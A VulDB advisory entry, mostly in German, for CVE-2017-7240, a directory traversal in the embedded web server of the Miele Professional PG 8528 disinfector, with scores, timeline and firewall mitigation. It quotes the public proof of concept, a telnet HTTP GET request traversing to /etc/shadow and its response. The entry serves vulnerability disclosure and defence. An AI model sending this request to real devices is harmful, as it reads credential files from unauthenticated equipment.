Miele Professional PG 8528 PST10 Embedded Web Server Directory Traversal

CVSS Meta Temp ScoreAktueller Exploitpreis (≈)CTI Interest Score
6.2$0-$5k0.00

Es wurde eine kritische Schwachstelle in Miele Professional PG 8528 PST10 - die betroffene Version ist unbekannt - ausgemacht. Es betrifft eine unbekannte Funktion der Komponente Embedded Web Server. Durch Manipulation mit der Eingabe /../../../../../../../../../../../../etc/shadow kann eine Directory Traversal-Schwachstelle ausgenutzt werden. Im Rahmen von CWE wurde eine Klassifizierung als CWE-22 vorgenommen. Das hat Auswirkungen auf die Vertraulichkeit. CVE fasst zusammen:

An issue was discovered on Miele Professional PG 8528 PST10 devices. The corresponding embedded webserver "PST10 WebServer" typically listens to port 80 and is prone to a directory traversal attack; therefore, an unauthenticated attacker may be able to exploit this issue to access sensitive information to aide in subsequent attacks. A Proof of Concept is GET /../../../../../../../../../../../../etc/shadow HTTP/1.1.

Entdeckt wurde das Problem am 16.11.2016. Die Schwachstelle wurde am 24.03.2017 durch Jens Regel in Form eines nicht definierten Mailinglist Posts (Full-Disclosure) publik gemacht. Das Advisory kann von seclists.org heruntergeladen werden. Die Verwundbarkeit wird seit dem 23.03.2017 unter CVE-2017-7240 geführt. Die Schwachstelle ist relativ beliebt, was unter anderem auf ihre geringe Komplexität zurückzuführen ist. Der Angriff kann über das Netzwerk erfolgen. Zur Ausnutzung ist keine spezifische Authentisierung erforderlich. Es sind sowohl technische Details als auch ein öffentlicher Exploit zur Schwachstelle bekannt. Es muss davon ausgegangen werden, dass ein Exploit zur Zeit etwa USD $0-$5k kostet (Preisberechnung vom 15.11.2022). Das MITRE ATT&CK Projekt deklariert die Angriffstechnik als T1006. Diese Schwachstelle gilt aufgrund ihrer speziellen Ausprägung als historisch interessant.

Ein öffentlicher Exploit wurde durch Jens Regel in HTTP GET Request entwickelt und sofort nach dem Advisory veröffentlicht. Der Exploit wird unter seclists.org zur Verfügung gestellt. Er wird als proof-of-concept gehandelt. Insgesamt wurde die Schwachstelle mindestens 128 Tage als nicht öffentlicher Zero-Day gehandelt. Während dieser Zeit erzielte er wohl etwa $5k-$25k auf dem Schwarzmarkt. Der durch den Exploit genutzte Code gestaltet sich wie folgt:

~$ telnet 192.168.0.1 80
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character ist '^]'.
GET /../../../../../../../../../../../../etc/shadow HTTP/1.1

HTTP/1.1 200 OK
Date: Wed, 16 Nov 2016 11:58:50 GMT
Server: PST10 WebServer
Content-Type: application/octet-stream
Last-Modified: Fri, 22 Feb 2013 10:04:40 GMT
Content-disposition: attachment; filename="./etc/shadow"
Accept-Ranges: bytes
Content-Length: 52

root:$1$$Md0i[...snip...]Z001:10933:0:99999:7:::

Die Schwachstelle kann durch das Filtern von tcp/80 (Web Services) mittels Firewalling mitigiert werden.

Unter anderem wird der Fehler auch in der Verwundbarkeitsdatenbank von Exploit-DB (41718) dokumentiert. Weitere Informationen werden unter theregister.co.uk bereitgestellt.

Produktinfo

Hersteller

Name

CPE 2.3info

CPE 2.2info

CVSSv4info

VulDB CVSS-B Score: 🔍
VulDB CVSS-BT Score: 🔍
VulDB Vector: 🔍
VulDB Zuverlässigkeit: 🔍

CVSSv3info

VulDB Meta Base Score: 6.4
VulDB Meta Temp Score: 6.2

VulDB Base Score: 5.3
VulDB Temp Score: 4.9
VulDB Vector: 🔍
VulDB Zuverlässigkeit: 🔍

NVD Base Score: 7.5
NVD Vector: 🔍

CVSSv2info

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
VektorKomplexitätAuthentisierungVertraulichkeitIntegritätVerfügbarkeit
freischaltenfreischaltenfreischaltenfreischaltenfreischaltenfreischalten
freischaltenfreischaltenfreischaltenfreischaltenfreischaltenfreischalten
freischaltenfreischaltenfreischaltenfreischaltenfreischaltenfreischalten

VulDB Base Score: 🔍
VulDB Temp Score: 🔍
VulDB Zuverlässigkeit: 🔍

Researcher Base Score: 🔍
NVD Base Score: 🔍

Exploitinginfo

Klasse: Directory Traversal
CWE: CWE-22
ATT&CK: T1006

Lokal: Nein
Remote: Ja

Verfügbarkeit: 🔍
Zugang: öffentlich
Status: Proof-of-Concept
Autor: Jens Regel
Programmiersprache: 🔍
Download: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

Preisentwicklung: 🔍
Aktuelle Preisschätzung: 🔍

0-Dayfreischaltenfreischaltenfreischaltenfreischalten
Heutefreischaltenfreischaltenfreischaltenfreischalten

OpenVAS ID: 804587
OpenVAS Name: Miele Professional PG 8528 Directory Traversal Vulnerability
OpenVAS Datei: 🔍
OpenVAS Family: 🔍

Exploit-DB: 🔍

Threat Intelligenceinfo

Interesse: 🔍
Aktive Akteure: 🔍
Aktive APT Gruppen: 🔍

Gegenmassnahmeninfo

Empfehlung: Firewall
Status: 🔍

0-Day Time: 🔍
Exploit Delay Time: 🔍

Firewalling: 🔍

Timelineinfo

16.11.2016 🔍
03.12.2016 +17 Tage 🔍
23.03.2017 +110 Tage 🔍
24.03.2017 +1 Tage 🔍
24.03.2017 +0 Tage 🔍
24.03.2017 +0 Tage 🔍
24.03.2017 +0 Tage 🔍
24.03.2017 +0 Tage 🔍
24.03.2017 +0 Tage 🔍
15.11.2022 +2062 Tage 🔍

Quelleninfo

Advisory: seclists.org
Person: Jens Regel
Status: Nicht definiert

CVE: CVE-2017-7240 (🔍)
SecurityFocus: 97080 - Miele Professional PG 8528 CVE-2017-7240 Directory Traversal Vulnerability

scip Labs: https://www.scip.ch/?labs.20161013
Diverses: 🔍

Eintraginfo

Erstellt: 24.03.2017 19:01
Aktualisierung: 15.11.2022 09:56
Anpassungen: 24.03.2017 19:01 (60), 19.04.2017 10:42 (19), 15.11.2022 09:56 (14)
Komplett: 🔍

Diskussion

Bisher keine Kommentare. Sprachen: de + en.

Bitte loggen Sie sich ein, um kommentieren zu können.

Do you want to use VulDB in your project?

Use the official API to access entries easily!